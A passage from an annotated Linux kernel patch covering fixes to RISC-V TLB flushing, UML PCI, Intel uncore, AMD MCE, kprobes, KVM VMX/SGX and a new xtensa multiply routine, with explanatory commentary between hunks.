+ 		} else if (size <= stride) {
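
The flush path above now defers work: harts currently running the mm (cmask) get an immediate SBI flush, every other hart is only marked stale in tlb_stale_mask, and the context.c hunk earlier pays the debt with local_flush_tlb_all_asid() when the mm next lands on a stale hart. A toy single-file model of that bookkeeping, with a bool array standing in for cpumask_t (illustrative only, not kernel code):

    #include <stdbool.h>
    #include <stdio.h>

    #define NR_HARTS 4

    static bool tlb_stale[NR_HARTS];  /* models mm->context.tlb_stale_mask */

    static void flush_range(int initiator)
    {
            /* Initiator flushes locally; all other harts are marked stale. */
            for (int h = 0; h < NR_HARTS; h++)
                    tlb_stale[h] = (h != initiator);
            printf("hart %d: sfence.vma now\n", initiator);
    }

    static void switch_mm(int hart)
    {
            /* The deferred flush happens on first use after migration. */
            if (tlb_stale[hart]) {
                    tlb_stale[hart] = false;
                    printf("hart %d: deferred sfence.vma x0, asid\n", hart);
            }
    }

    int main(void)
    {
            flush_range(0);
            switch_mm(2);   /* flushes */
            switch_mm(2);   /* already clean */
            return 0;
    }
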
+diff --git a/arch/um/drivers/virt-pci.c b/arch/um/drivers/virt-pci.c
+index acb55b302b14c..3ac220dafec4a 100644
+--- a/arch/um/drivers/virt-pci.c
++++ b/arch/um/drivers/virt-pci.c
+@@ -97,7 +97,8 @@ static int um_pci_send_cmd(struct um_pci_device *dev,
+ 	}
+ 
+ 	buf = get_cpu_var(um_pci_msg_bufs);
+-	memcpy(buf, cmd, cmd_size);
++	if (buf)
++		memcpy(buf, cmd, cmd_size);
+ 
+ 	if (posted) {
+ 		u8 *ncmd = kmalloc(cmd_size + extra_size, GFP_ATOMIC);
+@@ -182,6 +183,7 @@ static unsigned long um_pci_cfgspace_read(void *priv, unsigned int offset,
+ 	struct um_pci_message_buffer *buf;
+ 	u8 *data;
+ 	unsigned long ret = ULONG_MAX;
++	size_t bytes = sizeof(buf->data);
+ 
+ 	if (!dev)
+ 		return ULONG_MAX;
+@@ -189,7 +191,8 @@ static unsigned long um_pci_cfgspace_read(void *priv, unsigned int offset,
+ 	buf = get_cpu_var(um_pci_msg_bufs);
+ 	data = buf->data;
+ 
+-	memset(buf->data, 0xff, sizeof(buf->data));
++	if (buf)
++		memset(data, 0xff, bytes);
+ 
+ 	switch (size) {
+ 	case 1:
+@@ -204,7 +207,7 @@ static unsigned long um_pci_cfgspace_read(void *priv, unsigned int offset,
+ 		goto out;
+ 	}
+ 
+-	if (um_pci_send_cmd(dev, &hdr, sizeof(hdr), NULL, 0, data, 8))
++	if (um_pci_send_cmd(dev, &hdr, sizeof(hdr), NULL, 0, data, bytes))
+ 		goto out;
+ 
+ 	switch (size) {
+diff --git a/arch/x86/events/intel/uncore.h b/arch/x86/events/intel/uncore.h
+index 2adeaf4de4df6..b363fddc2a89e 100644
+--- a/arch/x86/events/intel/uncore.h
++++ b/arch/x86/events/intel/uncore.h
+@@ -2,6 +2,7 @@
+ #include <linux/slab.h>
+ #include <linux/pci.h>
+ #include <asm/apicdef.h>
++#include <asm/intel-family.h>
+ #include <linux/io-64-nonatomic-lo-hi.h>
+ 
+ #include <linux/perf_event.h>
+diff --git a/arch/x86/events/intel/uncore_snbep.c b/arch/x86/events/intel/uncore_snbep.c
+index fcd95e93f479a..8f371f3cbbd24 100644
+--- a/arch/x86/events/intel/uncore_snbep.c
++++ b/arch/x86/events/intel/uncore_snbep.c
+@@ -3804,6 +3804,21 @@ static const struct attribute_group *skx_iio_attr_update[] = {
+ 	NULL,
+ };
+ 
++static void pmu_clear_mapping_attr(const struct attribute_group **groups,
++				   struct attribute_group *ag)
++{
++	int i;
++
++	for (i = 0; groups[i]; i++) {
++		if (groups[i] == ag) {
++			for (i++; groups[i]; i++)
++				groups[i - 1] = groups[i];
++			groups[i - 1] = NULL;
++			break;
++		}
++	}
++}
++
+ static int
+ pmu_iio_set_mapping(struct intel_uncore_type *type, struct attribute_group *ag)
+ {
+@@ -3852,7 +3867,7 @@ clear_attrs:
+ clear_topology:
+ 	kfree(type->topology);
+ clear_attr_update:
+-	type->attr_update = NULL;
++	pmu_clear_mapping_attr(type->attr_update, ag);
+ 	return ret;
+ }
+ 
+@@ -5144,6 +5159,11 @@ static int icx_iio_get_topology(struct intel_uncore_type *type)
+ 
+ static int icx_iio_set_mapping(struct intel_uncore_type *type)
+ {
++	/* Detect ICX-D system. This case is not supported */
++	if (boot_cpu_data.x86_model == INTEL_FAM6_ICELAKE_D) {
++		pmu_clear_mapping_attr(type->attr_update, &icx_iio_mapping_group);
++		return -EPERM;
++	}
+ 	return pmu_iio_set_mapping(type, &icx_iio_mapping_group);
+ }
+ 
+diff --git a/arch/x86/kernel/cpu/mce/amd.c b/arch/x86/kernel/cpu/mce/amd.c
+index 1c87501e0fa3d..10fb5b5c9efa4 100644
+--- a/arch/x86/kernel/cpu/mce/amd.c
++++ b/arch/x86/kernel/cpu/mce/amd.c
+@@ -788,6 +788,24 @@ _log_error_bank(unsigned int bank, u32 msr_stat, u32 msr_addr, u64 misc)
+ 	return status & MCI_STATUS_DEFERRED;
+ }
+ 
++static bool _log_error_deferred(unsigned int bank, u32 misc)
++{
++	if (!_log_error_bank(bank, mca_msr_reg(bank, MCA_STATUS),
++			     mca_msr_reg(bank, MCA_ADDR), misc))
++		return false;
++
++	/*
++	 * Non-SMCA systems don't have MCA_DESTAT/MCA_DEADDR registers.
++	 * Return true here to avoid accessing these registers.
++	 */
++	if (!mce_flags.smca)
++		return true;
++
++	/* Clear MCA_DESTAT if the deferred error was logged from MCA_STATUS. */
++	wrmsrl(MSR_AMD64_SMCA_MCx_DESTAT(bank), 0);
++	return true;
++}
++
+ /*
+  * We have three scenarios for checking for Deferred errors:
+  *
+@@ -799,19 +817,8 @@ _log_error_bank(unsigned int bank, u32 msr_stat, u32 msr_addr, u64 misc)
+  */
+ static void log_error_deferred(unsigned int bank)
+ {
+-	bool defrd;
+-
+-	defrd = _log_error_bank(bank, mca_msr_reg(bank, MCA_STATUS),
+-				mca_msr_reg(bank, MCA_ADDR), 0);
+-
+-	if (!mce_flags.smca)
+-		return;
+-
+-	/* Clear MCA_DESTAT if we logged the deferred error from MCA_STATUS. */
+-	if (defrd) {
+-		wrmsrl(MSR_AMD64_SMCA_MCx_DESTAT(bank), 0);
++	if (_log_error_deferred(bank, 0))
+ 		return;
+-	}
+ 
+ 	/*
+ 	 * Only deferred errors are logged in MCA_DE{STAT,ADDR} so just check
+@@ -832,7 +839,7 @@ static void amd_deferred_error_interrupt(void)
+ 
+ static void log_error_thresholding(unsigned int bank, u64 misc)
+ {
+-	_log_error_bank(bank, mca_msr_reg(bank, MCA_STATUS), mca_msr_reg(bank, MCA_ADDR), misc);
++	_log_error_deferred(bank, misc);
+ }
+ 
+ static void log_and_reset_block(struct threshold_block *block)
+diff --git a/arch/x86/kernel/cpu/microcode/intel.c b/arch/x86/kernel/cpu/microcode/intel.c
+index 1fcbd671f1dff..048e38ec99e71 100644
+--- a/arch/x86/kernel/cpu/microcode/intel.c
++++ b/arch/x86/kernel/cpu/microcode/intel.c
+@@ -621,7 +621,6 @@ void load_ucode_intel_ap(void)
+ 	else
+ 		iup = &intel_ucode_patch;
+ 
+-reget:
+ 	if (!*iup) {
+ 		patch = __load_ucode_intel(&uci);
+ 		if (!patch)
+@@ -632,12 +631,7 @@ reget:
+ 
+ 	uci.mc = *iup;
+ 
+-	if (apply_microcode_early(&uci, true)) {
+-		/* Mixed-silicon system? Try to refetch the proper patch: */
+-		*iup = NULL;
+-
+-		goto reget;
+-	}
++	apply_microcode_early(&uci, true);
+ }
+ 
+ static struct microcode_intel *find_patch(struct ucode_cpu_info *uci)
+diff --git a/arch/x86/kernel/fpu/xstate.c b/arch/x86/kernel/fpu/xstate.c
+index 59e543b95a3c6..c2dde46a538e7 100644
+--- a/arch/x86/kernel/fpu/xstate.c
++++ b/arch/x86/kernel/fpu/xstate.c
+@@ -440,8 +440,8 @@ static void __init __xstate_dump_leaves(void)
+ 	}
+ }
+ 
+-#define XSTATE_WARN_ON(x) do {							\
+-	if (WARN_ONCE(x, "XSAVE consistency problem, dumping leaves")) {	\
++#define XSTATE_WARN_ON(x, fmt, ...) do {					\
++	if (WARN_ONCE(x, "XSAVE consistency problem: " fmt, ##__VA_ARGS__)) {	\
+ 		__xstate_dump_leaves();						\
+ 	}									\
+ } while (0)
+@@ -554,8 +554,7 @@ static bool __init check_xstate_against_struct(int nr)
+ 	    (nr >= XFEATURE_MAX) ||
+ 	    (nr == XFEATURE_PT_UNIMPLEMENTED_SO_FAR) ||
+ 	    ((nr >= XFEATURE_RSRVD_COMP_11) && (nr <= XFEATURE_RSRVD_COMP_16))) {
+-		WARN_ONCE(1, "no structure for xstate: %d\n", nr);
+-		XSTATE_WARN_ON(1);
++		XSTATE_WARN_ON(1, "No structure for xstate: %d\n", nr);
+ 		return false;
+ 	}
+ 	return true;
+@@ -598,12 +597,13 @@ static bool __init paranoid_xstate_size_valid(unsigned int kernel_size)
+ 		 * XSAVES.
+ 		 */
+ 		if (!xsaves && xfeature_is_supervisor(i)) {
+-			XSTATE_WARN_ON(1);
++			XSTATE_WARN_ON(1, "Got supervisor feature %d, but XSAVES not advertised\n", i);
+ 			return false;
+ 		}
+ 	}
+ 	size = xstate_calculate_size(fpu_kernel_cfg.max_features, compacted);
+-	XSTATE_WARN_ON(size != kernel_size);
++	XSTATE_WARN_ON(size != kernel_size,
++		       "size %u != kernel_size %u\n", size, kernel_size);
+ 	return size == kernel_size;
+ }
+ 
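
The XSTATE_WARN_ON() rework above threads a printf-style message through the macro, so each warning states what actually mismatched instead of only the generic "dumping leaves" text. A user-space analogue of the macro shape (GNU C, since ##__VA_ARGS__ is an extension; CHECK_WARN is a hypothetical name):

    #include <stdio.h>

    #define CHECK_WARN(x, fmt, ...) do {                            \
            if (x)                                                  \
                    fprintf(stderr, "consistency problem: " fmt,    \
                            ##__VA_ARGS__);                         \
    } while (0)

    int main(void)
    {
            unsigned int size = 832, kernel_size = 840;

            CHECK_WARN(size != kernel_size, "size %u != kernel_size %u\n",
                       size, kernel_size);
            return 0;
    }
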
+diff --git a/arch/x86/kernel/ftrace.c b/arch/x86/kernel/ftrace.c
+index bd165004776d9..e07234ec7e237 100644
+--- a/arch/x86/kernel/ftrace.c
++++ b/arch/x86/kernel/ftrace.c
+@@ -217,7 +217,9 @@ void ftrace_replace_code(int enable)
+ 
+ 		ret = ftrace_verify_code(rec->ip, old);
+ 		if (ret) {
++			ftrace_expected = old;
+ 			ftrace_bug(ret, rec);
++			ftrace_expected = NULL;
+ 			return;
+ 		}
+ 	}
+diff --git a/arch/x86/kernel/kprobes/core.c b/arch/x86/kernel/kprobes/core.c
+index eb8bc82846b99..5be7f23099e1f 100644
+--- a/arch/x86/kernel/kprobes/core.c
++++ b/arch/x86/kernel/kprobes/core.c
+@@ -37,6 +37,7 @@
+ #include <linux/extable.h>
+ #include <linux/kdebug.h>
+ #include <linux/kallsyms.h>
++#include <linux/kgdb.h>
+ #include <linux/ftrace.h>
+ #include <linux/kasan.h>
+ #include <linux/moduleloader.h>
+@@ -281,12 +282,15 @@ static int can_probe(unsigned long paddr)
+ 		if (ret < 0)
+ 			return 0;
+ 
++#ifdef CONFIG_KGDB
+ 		/*
+-		 * Another debugging subsystem might insert this breakpoint.
+-		 * In that case, we can't recover it.
++		 * If there is a dynamically installed kgdb sw breakpoint,
++		 * this function should not be probed.
+ 		 */
+-		if (insn.opcode.bytes[0] == INT3_INSN_OPCODE)
++		if (insn.opcode.bytes[0] == INT3_INSN_OPCODE &&
++		    kgdb_has_hit_break(addr))
+ 			return 0;
++#endif
+ 		addr += insn.length;
+ 	}
+ 
+diff --git a/arch/x86/kernel/kprobes/opt.c b/arch/x86/kernel/kprobes/opt.c
+index e6b8c5362b945..e57e07b0edb64 100644
+--- a/arch/x86/kernel/kprobes/opt.c
++++ b/arch/x86/kernel/kprobes/opt.c
+@@ -15,6 +15,7 @@
+ #include <linux/extable.h>
+ #include <linux/kdebug.h>
+ #include <linux/kallsyms.h>
++#include <linux/kgdb.h>
+ #include <linux/ftrace.h>
+ #include <linux/objtool.h>
+ #include <linux/pgtable.h>
+@@ -279,19 +280,6 @@ static int insn_is_indirect_jump(struct insn *insn)
+ 	return ret;
+ }
+ 
+-static bool is_padding_int3(unsigned long addr, unsigned long eaddr)
+-{
+-	unsigned char ops;
+-
+-	for (; addr < eaddr; addr++) {
+-		if (get_kernel_nofault(ops, (void *)addr) < 0 ||
+-		    ops != INT3_INSN_OPCODE)
+-			return false;
+-	}
+-
+-	return true;
+-}
+-
+ /* Decode whole function to ensure any instructions don't jump into target */
+ static int can_optimize(unsigned long paddr)
+ {
+@@ -334,15 +322,15 @@ static int can_optimize(unsigned long paddr)
+ 		ret = insn_decode_kernel(&insn, (void *)recovered_insn);
+ 		if (ret < 0)
+ 			return 0;
+-
++#ifdef CONFIG_KGDB
+ 		/*
+-		 * In the case of detecting unknown breakpoint, this could be
+-		 * a padding INT3 between functions. Let's check that all the
+-		 * rest of the bytes are also INT3.
++		 * If there is a dynamically installed kgdb sw breakpoint,
++		 * this function should not be probed.
+ 		 */
+-		if (insn.opcode.bytes[0] == INT3_INSN_OPCODE)
+-			return is_padding_int3(addr, paddr - offset + size) ? 1 : 0;
+-
++		if (insn.opcode.bytes[0] == INT3_INSN_OPCODE &&
++		    kgdb_has_hit_break(addr))
++			return 0;
++#endif
+ 		/* Recover address */
+ 		insn.kaddr = (void *)addr;
+ 		insn.next_byte = (void *)(addr + insn.length);
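
Both kprobes hunks share one rule: while linearly decoding the target
function, an INT3 byte no longer disqualifies the probe outright; it only
does so when kgdb owns that breakpoint. A condensed sketch of the loop
(kgdb_has_hit_break() is the ownership test from <linux/kgdb.h>, which is
exactly why both files gain that include):

	while (addr < end) {
		/* decode one instruction at addr ... */
	#ifdef CONFIG_KGDB
		if (insn.opcode.bytes[0] == INT3_INSN_OPCODE &&
		    kgdb_has_hit_break(addr))
			return 0;	/* refuse: kgdb owns this INT3 */
	#endif
		addr += insn.length;
	}

Padding INT3s between functions no longer need the special-case scan that
opt.c just removed.
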
+diff --git a/arch/x86/kvm/lapic.c b/arch/x86/kvm/lapic.c
+index d7639d126e6c7..bf5ce862c4daf 100644
+--- a/arch/x86/kvm/lapic.c
++++ b/arch/x86/kvm/lapic.c
+@@ -2722,8 +2722,6 @@ static int kvm_apic_state_fixup(struct kvm_vcpu *vcpu,
+ 			icr = __kvm_lapic_get_reg64(s->regs, APIC_ICR);
+ 			__kvm_lapic_set_reg(s->regs, APIC_ICR2, icr >> 32);
+ 		}
+-	} else {
+-		kvm_lapic_xapic_id_updated(vcpu->arch.apic);
+ 	}
+ 
+ 	return 0;
+@@ -2759,6 +2757,9 @@ int kvm_apic_set_state(struct kvm_vcpu *vcpu, struct kvm_lapic_state *s)
+ 	}
+ 	memcpy(vcpu->arch.apic->regs, s->regs, sizeof(*s));
+ 
++	if (!apic_x2apic_mode(apic))
++		kvm_lapic_xapic_id_updated(apic);
++
+ 	atomic_set_release(&apic->vcpu->kvm->arch.apic_map_dirty, DIRTY);
+ 	kvm_recalculate_apic_map(vcpu->kvm);
+ 	kvm_apic_set_version(vcpu);
+diff --git a/arch/x86/kvm/vmx/nested.c b/arch/x86/kvm/vmx/nested.c
+index 5b0d4859e4b78..10c63b1bf92fa 100644
+--- a/arch/x86/kvm/vmx/nested.c
++++ b/arch/x86/kvm/vmx/nested.c
+@@ -5100,24 +5100,35 @@ static int handle_vmxon(struct kvm_vcpu *vcpu)
+ 		| FEAT_CTL_VMX_ENABLED_OUTSIDE_SMX;
+ 
+ 	/*
+-	 * Note, KVM cannot rely on hardware to perform the CR0/CR4 #UD checks
+-	 * that have higher priority than VM-Exit (see Intel SDM's pseudocode
+-	 * for VMXON), as KVM must load valid CR0/CR4 values into hardware while
+-	 * running the guest, i.e. KVM needs to check the _guest_ values.
++	 * Manually perform the CR4.VMXE check; KVM must force CR4.VMXE=1 to
++	 * enter the guest and so cannot rely on hardware to perform the
++	 * check, which has higher priority than VM-Exit (see Intel SDM's
++	 * pseudocode for VMXON).
+ 	 *
+-	 * Rely on hardware for the other two pre-VM-Exit checks, !VM86 and
+-	 * !COMPATIBILITY modes.  KVM may run the guest in VM86 to emulate Real
+-	 * Mode, but KVM will never take the guest out of those modes.
++	 * Rely on hardware for the other pre-VM-Exit checks, CR0.PE=1, !VM86
++	 * and !COMPATIBILITY modes.  For an unrestricted guest, KVM doesn't
++	 * force any of the relevant guest state.  For a restricted guest, KVM
++	 * does force CR0.PE=1, but only to also force VM86 in order to emulate
++	 * Real Mode, and so there's no need to check CR0.PE manually.
+ 	 */
+-	if (!nested_host_cr0_valid(vcpu, kvm_read_cr0(vcpu)) ||
+-	    !nested_host_cr4_valid(vcpu, kvm_read_cr4(vcpu))) {
++	if (!kvm_read_cr4_bits(vcpu, X86_CR4_VMXE)) {
+ 		kvm_queue_exception(vcpu, UD_VECTOR);
+ 		return 1;
+ 	}
+ 
+ 	/*
+-	 * CPL=0 and all other checks that are lower priority than VM-Exit must
+-	 * be checked manually.
++	 * The CPL is checked for "not in VMX operation" and for "in VMX root",
++	 * and has higher priority than the VM-Fail due to being post-VMXON,
++	 * i.e. VMXON #GPs outside of VMX non-root if CPL!=0.  In VMX non-root,
++	 * VMXON causes VM-Exit and KVM unconditionally forwards VMXON VM-Exits
++	 * from L2 to L1, i.e. there's no need to check for the vCPU being in
++	 * VMX non-root.
++	 *
++	 * Forwarding the VM-Exit unconditionally, i.e. without performing the
++	 * #UD checks (see above), is functionally ok because KVM doesn't allow
++	 * L1 to run L2 without CR4.VMXE=1, and because KVM never modifies L2's
++	 * CR0 or CR4, i.e. it's L1's responsibility to emulate #UDs that are
++	 * missed by hardware due to shadowing CR0 and/or CR4.
+ 	 */
+ 	if (vmx_get_cpl(vcpu)) {
+ 		kvm_inject_gp(vcpu, 0);
+@@ -5127,6 +5138,17 @@ static int handle_vmxon(struct kvm_vcpu *vcpu)
+ 	if (vmx->nested.vmxon)
+ 		return nested_vmx_fail(vcpu, VMXERR_VMXON_IN_VMX_ROOT_OPERATION);
+ 
++	/*
++	 * Invalid CR0/CR4 generates #GP.  These checks are performed if and
++	 * only if the vCPU isn't already in VMX operation, i.e. effectively
++	 * have lower priority than the VM-Fail above.
++	 */
++	if (!nested_host_cr0_valid(vcpu, kvm_read_cr0(vcpu)) ||
++	    !nested_host_cr4_valid(vcpu, kvm_read_cr4(vcpu))) {
++		kvm_inject_gp(vcpu, 0);
++		return 1;
++	}
++
+ 	if ((vmx->msr_ia32_feature_control & VMXON_NEEDED_FEATURES)
+ 			!= VMXON_NEEDED_FEATURES) {
+ 		kvm_inject_gp(vcpu, 0);
+@@ -6808,7 +6830,8 @@ void nested_vmx_setup_ctls_msrs(struct vmcs_config *vmcs_conf, u32 ept_caps)
+ 		SECONDARY_EXEC_ENABLE_INVPCID |
+ 		SECONDARY_EXEC_RDSEED_EXITING |
+ 		SECONDARY_EXEC_XSAVES |
+-		SECONDARY_EXEC_TSC_SCALING;
++		SECONDARY_EXEC_TSC_SCALING |
++		SECONDARY_EXEC_ENABLE_USR_WAIT_PAUSE;
+ 
+ 	/*
+ 	 * We can emulate "VMCS shadowing," even if the hardware
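
Condensed, the emulated VMXON now faults in this priority order (a summary
of the hunks above, not verbatim code):

	CR4.VMXE == 0                -> #UD     (checked manually, highest priority)
	CPL != 0                     -> #GP(0)
	already post-VMXON           -> VM-Fail (VMXERR_VMXON_IN_VMX_ROOT_OPERATION)
	invalid CR0/CR4              -> #GP(0)  (previously #UD, before the VM-Fail)
	feature control MSR invalid  -> #GP(0)

The user-visible change is the fourth step: incompatible CR0/CR4 values are
now reported with #GP, and only after the "already in VMX root" VM-Fail.
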
+diff --git a/arch/x86/kvm/vmx/sgx.c b/arch/x86/kvm/vmx/sgx.c
+index 8f95c7c014335..b12da2a6dec95 100644
+--- a/arch/x86/kvm/vmx/sgx.c
++++ b/arch/x86/kvm/vmx/sgx.c
+@@ -182,8 +182,10 @@ static int __handle_encls_ecreate(struct kvm_vcpu *vcpu,
+ 	/* Enforce CPUID restriction on max enclave size. */
+ 	max_size_log2 = (attributes & SGX_ATTR_MODE64BIT) ? sgx_12_0->edx >> 8 :
+ 							    sgx_12_0->edx;
+-	if (size >= BIT_ULL(max_size_log2))
++	if (size >= BIT_ULL(max_size_log2)) {
+ 		kvm_inject_gp(vcpu, 0);
++		return 1;
++	}
+ 
+ 	/*
+ 	 * sgx_virt_ecreate() returns:
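
The sgx.c hunk is the standard inject-then-return idiom: kvm_inject_gp()
only queues the exception for delivery, so without the added return the
handler would keep emulating ECREATE with a size that just faulted. The
fixed check reads:

	if (size >= BIT_ULL(max_size_log2)) {
		kvm_inject_gp(vcpu, 0);	/* queue #GP(0) for the guest */
		return 1;		/* and stop emulating here    */
	}
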
+diff --git a/arch/xtensa/kernel/xtensa_ksyms.c b/arch/xtensa/kernel/xtensa_ksyms.c
+index b0bc8897c924f..2a31b1ab0c9f2 100644
+--- a/arch/xtensa/kernel/xtensa_ksyms.c
++++ b/arch/xtensa/kernel/xtensa_ksyms.c
+@@ -62,6 +62,7 @@ extern int __modsi3(int, int);
+ extern int __mulsi3(int, int);
+ extern unsigned int __udivsi3(unsigned int, unsigned int);
+ extern unsigned int __umodsi3(unsigned int, unsigned int);
++extern unsigned long long __umulsidi3(unsigned int, unsigned int);
+ 
+ EXPORT_SYMBOL(__ashldi3);
+ EXPORT_SYMBOL(__ashrdi3);
+@@ -71,6 +72,7 @@ EXPORT_SYMBOL(__modsi3);
+ EXPORT_SYMBOL(__mulsi3);
+ EXPORT_SYMBOL(__udivsi3);
+ EXPORT_SYMBOL(__umodsi3);
++EXPORT_SYMBOL(__umulsidi3);
+ 
+ unsigned int __sync_fetch_and_and_4(volatile void *p, unsigned int v)
+ {
+diff --git a/arch/xtensa/lib/Makefile b/arch/xtensa/lib/Makefile
+index d4e9c397e3fde..7ecef0519a27c 100644
+--- a/arch/xtensa/lib/Makefile
++++ b/arch/xtensa/lib/Makefile
+@@ -5,7 +5,7 @@
+ 
+ lib-y	+= memcopy.o memset.o checksum.o \
+ 	   ashldi3.o ashrdi3.o lshrdi3.o \
+-	   divsi3.o udivsi3.o modsi3.o umodsi3.o mulsi3.o \
++	   divsi3.o udivsi3.o modsi3.o umodsi3.o mulsi3.o umulsidi3.o \
+ 	   usercopy.o strncpy_user.o strnlen_user.o
+ lib-$(CONFIG_PCI) += pci-auto.o
+ lib-$(CONFIG_KCSAN) += kcsan-stubs.o
+diff --git a/arch/xtensa/lib/umulsidi3.S b/arch/xtensa/lib/umulsidi3.S
+new file mode 100644
+index 0000000000000..1360816479427
+--- /dev/null
++++ b/arch/xtensa/lib/umulsidi3.S
+@@ -0,0 +1,230 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later WITH GCC-exception-2.0 */
++#include <linux/linkage.h>
++#include <asm/asmmacro.h>
++#include <asm/core.h>
++
++#if !XCHAL_HAVE_MUL16 && !XCHAL_HAVE_MUL32 && !XCHAL_HAVE_MAC16
++#define XCHAL_NO_MUL 1
++#endif
++
++ENTRY(__umulsidi3)
++
++#ifdef __XTENSA_CALL0_ABI__
++	abi_entry(32)
++	s32i	a12, sp, 16
++	s32i	a13, sp, 20
++	s32i	a14, sp, 24
++	s32i	a15, sp, 28
++#elif XCHAL_NO_MUL
++	/* This is not really a leaf function; allocate enough stack space
++	   to allow CALL12s to a helper function.  */
++	abi_entry(32)
++#else
++	abi_entry_default
++#endif
++
++#ifdef __XTENSA_EB__
++#define wh a2
++#define wl a3
++#else
++#define wh a3
++#define wl a2
++#endif /* __XTENSA_EB__ */
++
++	/* This code is taken from the mulsf3 routine in ieee754-sf.S.
++	   See more comments there.  */
++
++#if XCHAL_HAVE_MUL32_HIGH
++	mull	a6, a2, a3
++	muluh	wh, a2, a3
++	mov	wl, a6
++
++#else /* ! MUL32_HIGH */
++
++#if defined(__XTENSA_CALL0_ABI__) && XCHAL_NO_MUL
++	/* a0 and a8 will be clobbered by calling the multiply function
++	   but a8 is not used here and need not be saved.  */
++	s32i	a0, sp, 0
++#endif
++
++#if XCHAL_HAVE_MUL16 || XCHAL_HAVE_MUL32
++
++#define a2h a4
++#define a3h a5
++
++	/* Get the high halves of the inputs into registers.  */
++	srli	a2h, a2, 16
++	srli	a3h, a3, 16
++
++#define a2l a2
++#define a3l a3
++
++#if XCHAL_HAVE_MUL32 && !XCHAL_HAVE_MUL16
++	/* Clear the high halves of the inputs.  This does not matter
++	   for MUL16 because the high bits are ignored.  */
++	extui	a2, a2, 0, 16
++	extui	a3, a3, 0, 16
++#endif
++#endif /* MUL16 || MUL32 */
++
++
++#if XCHAL_HAVE_MUL16
++
++#define do_mul(dst, xreg, xhalf, yreg, yhalf) \
++	mul16u	dst, xreg ## xhalf, yreg ## yhalf
++
++#elif XCHAL_HAVE_MUL32
++
++#define do_mul(dst, xreg, xhalf, yreg, yhalf) \
++	mull	dst, xreg ## xhalf, yreg ## yhalf
++
++#elif XCHAL_HAVE_MAC16
++
++/* The preprocessor insists on inserting a space when concatenating after
++   a period in the definition of do_mul below.  These macros are a workaround
++   using underscores instead of periods when doing the concatenation.  */
++#define umul_aa_ll umul.aa.ll
++#define umul_aa_lh umul.aa.lh
++#define umul_aa_hl umul.aa.hl
++#define umul_aa_hh umul.aa.hh
++
++#define do_mul(dst, xreg, xhalf, yreg, yhalf) \
++	umul_aa_ ## xhalf ## yhalf	xreg, yreg; \
++	rsr	dst, ACCLO
++
++#else /* no multiply hardware */
++
++#define set_arg_l(dst, src) \
++	extui	dst, src, 0, 16
++#define set_arg_h(dst, src) \
++	srli	dst, src, 16
++
++#ifdef __XTENSA_CALL0_ABI__
++#define do_mul(dst, xreg, xhalf, yreg, yhalf) \
++	set_arg_ ## xhalf (a13, xreg); \
++	set_arg_ ## yhalf (a14, yreg); \
++	call0	.Lmul_mulsi3; \
++	mov	dst, a12
++#else
++#define do_mul(dst, xreg, xhalf, yreg, yhalf) \
++	set_arg_ ## xhalf (a14, xreg); \
++	set_arg_ ## yhalf (a15, yreg); \
++	call12	.Lmul_mulsi3; \
++	mov	dst, a14
++#endif /* __XTENSA_CALL0_ABI__ */
++
++#endif /* no multiply hardware */
++
++	/* Add pp1 and pp2 into a6 with carry-out in a9.  */
++	do_mul(a6, a2, l, a3, h)	/* pp 1 */
++	do_mul(a11, a2, h, a3, l)	/* pp 2 */
++	movi	a9, 0
++	add	a6, a6, a11
++	bgeu	a6, a11, 1f
++	addi	a9, a9, 1
++1:
++	/* Shift the high half of a9/a6 into position in a9.  Note that
++	   this value can be safely incremented without any carry-outs.  */
++	ssai	16
++	src	a9, a9, a6
++
++	/* Compute the low word into a6.  */
++	do_mul(a11, a2, l, a3, l)	/* pp 0 */
++	sll	a6, a6
++	add	a6, a6, a11
++	bgeu	a6, a11, 1f
++	addi	a9, a9, 1
++1:
++	/* Compute the high word into wh.  */
++	do_mul(wh, a2, h, a3, h)	/* pp 3 */
++	add	wh, wh, a9
++	mov	wl, a6
++
++#endif /* !MUL32_HIGH */
++
++#if defined(__XTENSA_CALL0_ABI__) && XCHAL_NO_MUL
++	/* Restore the original return address.  */
++	l32i	a0, sp, 0
++#endif
++#ifdef __XTENSA_CALL0_ABI__
++	l32i	a12, sp, 16
++	l32i	a13, sp, 20
++	l32i	a14, sp, 24
++	l32i	a15, sp, 28
++	abi_ret(32)
++#else
++	abi_ret_default
++#endif
++
++#if XCHAL_NO_MUL
++
++	.macro	do_addx2 dst, as, at, tmp
++#if XCHAL_HAVE_ADDX
++	addx2	\dst, \as, \at
++#else
++	slli	\tmp, \as, 1
++	add	\dst, \tmp, \at
++#endif
++	.endm
++
++	.macro	do_addx4 dst, as, at, tmp
++#if XCHAL_HAVE_ADDX
++	addx4	\dst, \as, \at
++#else
++	slli	\tmp, \as, 2
++	add	\dst, \tmp, \at
++#endif
++	.endm
++
++	.macro	do_addx8 dst, as, at, tmp
++#if XCHAL_HAVE_ADDX
++	addx8	\dst, \as, \at
++#else
++	slli	\tmp, \as, 3
++	add	\dst, \tmp, \at
++#endif
++	.endm
++
++	/* For Xtensa processors with no multiply hardware, this simplified
++	   version of _mulsi3 is used for multiplying 16-bit chunks of
++	   the floating-point mantissas.  When using CALL0, this function
++	   uses a custom ABI: the inputs are passed in a13 and a14, the
++	   result is returned in a12, and a8 and a15 are clobbered.  */
++	.align	4
++.Lmul_mulsi3:
++	abi_entry_default
++
++	.macro mul_mulsi3_body dst, src1, src2, tmp1, tmp2
++	movi	\dst, 0
++1:	add	\tmp1, \src2, \dst
++	extui	\tmp2, \src1, 0, 1
++	movnez	\dst, \tmp1, \tmp2
++
++	do_addx2 \tmp1, \src2, \dst, \tmp1
++	extui	\tmp2, \src1, 1, 1
++	movnez	\dst, \tmp1, \tmp2
++
++	do_addx4 \tmp1, \src2, \dst, \tmp1
++	extui	\tmp2, \src1, 2, 1
++	movnez	\dst, \tmp1, \tmp2
++
++	do_addx8 \tmp1, \src2, \dst, \tmp1
++	extui	\tmp2, \src1, 3, 1
++	movnez	\dst, \tmp1, \tmp2
++
++	srli	\src1, \src1, 4
++	slli	\src2, \src2, 4
++	bnez	\src1, 1b
++	.endm
++
++#ifdef __XTENSA_CALL0_ABI__
++	mul_mulsi3_body a12, a13, a14, a15, a8
++#else
++	/* The result will be written into a2, so save that argument in a4.  */
++	mov	a4, a2
++	mul_mulsi3_body a2, a4, a3, a5, a6
++#endif
++	abi_ret_default
++#endif /* XCHAL_NO_MUL */
++
++ENDPROC(__umulsidi3)
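
The assembly above computes a full 32x32->64 multiply from 16-bit partial
products pp0..pp3. A hedged C equivalent of the scheme (illustration only;
umulsidi3() here is a made-up name for this sketch):

	#include <stdint.h>

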